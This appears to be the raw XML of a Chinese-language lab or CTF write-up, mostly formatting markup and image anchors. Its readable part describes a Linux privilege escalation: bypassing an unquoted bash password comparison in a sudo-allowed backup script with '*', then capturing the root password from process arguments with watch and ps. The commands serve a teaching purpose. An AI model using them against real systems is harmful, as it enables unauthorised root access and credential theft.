    <w:p w14:paraId="2C1C5C88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9749ADC" wp14:editId="6965CAE0">
            <wp:extent cx="4381500" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="193279366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77205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EAD0" w14:textId="3BBE58BA" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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31</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40B241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124F53B" wp14:editId="01E08399">
            <wp:extent cx="5274310" cy="969645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="186975805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13601" name="图片 1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1292" w14:textId="18BEE800" w:rsidR="00440B55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32</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B12655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A38BF1C" wp14:editId="3B5F8308">
            <wp:extent cx="5274310" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9274166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65703" name="图片 1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77B8" w14:textId="7657BCD5" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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33</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89A1AF" w14:textId="47072F7B" w:rsidR="00334466" w:rsidRDefault="00440B55" w:rsidP="007C0460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获取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root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用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CAD8D4" w14:textId="77777777" w:rsidR="00440B55" w:rsidRDefault="00440B55" w:rsidP="00440B55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命令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-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看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driana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用户的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权限，发现其存在一个脚本文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/opt/backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，查看该脚本。该脚本总体上是通过获取用户一个密码和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户的密码对比，对比正确后会压缩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下的文件，压缩密码使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码。这里的代码存在一个漏洞，即脚本</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if [[ $PASSWORD == $USER_PASS ]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>处代码在不使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>""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进行判等时</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，可以通过通配符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>绕过（当使用代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$USER_PASS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C46A0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>时才会按位对比，通配符无效）。在绕过后，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>$PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为了命令的参数被执行，因此可以通过进程监控来获得命令执行时的参数，从而拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BB8A4F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D69C0A3" wp14:editId="6D101B22">
            <wp:extent cx="5274310" cy="853440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="155414396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31247" name="图片 1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1581" w14:textId="49B3690B" w:rsidR="00440B55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34</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6916D3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DEDD31A" wp14:editId="47C847B7">
            <wp:extent cx="5274310" cy="2244090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="164405882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34602" name="图片 1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E38E" w14:textId="45BEBEC8" w:rsidR="00440B55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35</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4CBBCA" w14:textId="41A9E4A3" w:rsidR="00440B55" w:rsidRDefault="00440B55" w:rsidP="00440B55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打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssh -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d_rsa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</w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="00054DB1">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>adriana@192.168.6.173</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>新建立一个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driana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用户的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>watch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>工具，输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">watch -n 0.1 -d </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"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ps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-aux |grep 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usr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bin/zip &gt;&gt; ./watch.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31E1F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，监控命令。然后在原先的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driana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终端中输入命令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/opt/backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>运行该脚本，输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作为密码。脚本执行结束后切回第二个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driana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用户的终端，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>结束当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>watch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进程，输入命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cat watch.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，翻阅查看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码。输入命令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u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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，然后输入该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>密码，成功获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A7904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97404F4" wp14:editId="22EEFDCD">
            <wp:extent cx="5274310" cy="1417320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="195916685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58665" name="图片 1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224D" w14:textId="6FC59F68" w:rsidR="00440B55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36</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF01B7A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58B704C" wp14:editId="115FF0C0">
            <wp:extent cx="4991100" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1537233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832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CFCB" w14:textId="0A8A48FB" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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37</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B277B8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8A3A0C3" wp14:editId="285B165C">
            <wp:extent cx="5274310" cy="1002030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="185240113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80994" name="图片 1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8746" w14:textId="52F7B6AE" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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38</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F15805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9757FC5" wp14:editId="3BB372D2">
            <wp:extent cx="2543175" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="127403741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3858" name="图片 1" descr="图形用户界面, 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4AD1" w14:textId="0EF5D52E" w:rsidR="00440B55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39</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A22C57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E48BC5A" wp14:editId="776EAF45">
            <wp:extent cx="5274310" cy="4485005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="69621159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06601" name="图片 1" descr="文本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0B38" w14:textId="726B2EA0" w:rsidR="00440B55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40</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="182473CF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C46DD87" wp14:editId="75AD80CC">
            <wp:extent cx="5274310" cy="2373630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1085130000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07307" name="图片 1" descr="图片包含 图形用户界面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2E46" w14:textId="1744B061" w:rsidR="00440B55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41</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BAA65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C32FC96" wp14:editId="6B10BE50">
            <wp:extent cx="5274310" cy="1553845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1869277193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1626" name="图片 1" descr="图片包含 图形用户界面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F7C" w14:textId="3EBE4FFC" w:rsidR="00440B55" w:rsidRDefault="00A96360" w:rsidP="00A96360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42</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E605E" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00440B55" w:rsidP="00A96360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C61E943" wp14:editId="533EA640">
            <wp:extent cx="5219700" cy="1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="137273732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47681" name="图片 1" descr="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277E" w14:textId="3BEFE9A0" w:rsidR="00440B55" w:rsidRPr="00A96360" w:rsidRDefault="00A96360" w:rsidP="00A96360">
      <w:pPr>
        <w:pStyle w:val="ae"/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7C0460">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>43</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00440B55" w:rsidRPr="00A963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CE818" w14:textId="77777777" w:rsidR="0024245A" w:rsidRDefault="0024245A" w:rsidP="006D752A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6240BC15" w14:textId="77777777" w:rsidR="0024245A" w:rsidRDefault="0024245A" w:rsidP="006D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A4E25" w14:textId="77777777" w:rsidR="0024245A" w:rsidRDefault="0024245A" w:rsidP="006D752A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C8133CF" w14:textId="77777777" w:rsidR="0024245A" w:rsidRDefault="0024245A" w:rsidP="006D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2928"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B7C6626"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2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991381"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02E43FE4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F5E60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="965E1964"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2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3E2EAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BFE72E6"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="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A309F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB7A8F12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FE2F14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DEE470C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CB37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F217EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B71E7C6A"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1640" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:sz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9D35D6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1212C1F2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0B1D97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E26003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1A5E83"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41D04E56"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3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032E77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFA61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CC0907"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13B686F8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F302E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3A425FA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E96B3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="544A013C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96289E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0366B8D0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6027970">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1888757876">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="272833435">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2044357876">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="837043859">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="832721892">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1833526483">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1929924622">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="173543929">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="369184006">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1716848754">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="473109691">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="244460023">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1099789700">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1626765405">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="620183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A5"/>
    <w:rsid w:val="00000CF1"/>
    <w:rsid w:val="00000E6B"/>
    <w:rsid w:val="00002BC0"/>
    <w:rsid w:val="00007752"/>
    <w:rsid w:val="00012D2A"/>
    <w:rsid w:val="00012FEE"/>
    <w:rsid w:val="00013EEA"/>
    <w:rsid w:val="00013F58"/>
    <w:rsid w:val="00014931"/>
    <w:rsid w:val="000155E9"/>
    <w:rsid w:val="0001725F"/>
    <w:rsid w:val="00023F91"/>
    <w:rsid w:val="00024031"/>
    <w:rsid w:val="00024654"/>
    <w:rsid w:val="0002499F"/>
    <w:rsid w:val="000260F7"/>
